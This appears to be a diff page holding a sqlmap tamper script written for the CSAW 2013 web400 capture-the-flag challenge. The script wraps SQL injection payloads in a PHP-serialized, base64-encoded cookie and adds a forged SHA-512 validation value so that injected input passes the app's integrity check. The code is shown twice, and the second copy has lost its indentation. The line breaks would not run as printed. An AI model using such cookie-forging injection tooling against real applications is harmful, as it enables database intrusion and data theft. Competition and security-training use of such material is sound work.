nmcv · September 25, 2013 06:50
diff --git a/csaw2013-web400-tamper.py b/csaw2013-web400-tamper.py
 #!/usr/bin/env python

 from lib.core.enums import PRIORITY
 import phpserialize
 import urllib
 import base64
 import hashlib


 __priority__ = PRIORITY.HIGHEST


 def dependencies():
    pass


 def tamper(payload, **kwargs):

    if payload:
        param = []
        param.append(payload)

        serialized = phpserialize.dumps(param)
        #print serialized

        widget_validate = hashlib.sha512(serialized).hexdigest()
        #print widget_validate

        widget_tracker = {'widget_tracker': base64.b64encode(serialized)}
        widget_tracker = urllib.urlencode(widget_tracker)
        #print widget_tracker

        payload_out = widget_tracker.replace('widget_tracker=', '') +
                    '; widget_validate=' +
                    widget_validate + ';'

        return payload_out
	#!/usr/bin/env python

	from lib.core.enums import PRIORITY
	import phpserialize
	import urllib
	import base64
	import hashlib


	__priority__ = PRIORITY.HIGHEST


	def dependencies():
	pass


	def tamper(payload, **kwargs):

	if payload:
	param = []
	param.append(payload)

	serialized = phpserialize.dumps(param)
	#print serialized

	widget_validate = hashlib.sha512(serialized).hexdigest()
	#print widget_validate

	widget_tracker = {'widget_tracker': base64.b64encode(serialized)}
	widget_tracker = urllib.urlencode(widget_tracker)
	#print widget_tracker

	payload_out = widget_tracker.replace('widget_tracker=', '') +
	'; widget_validate=' +
	widget_validate + ';'

	return payload_out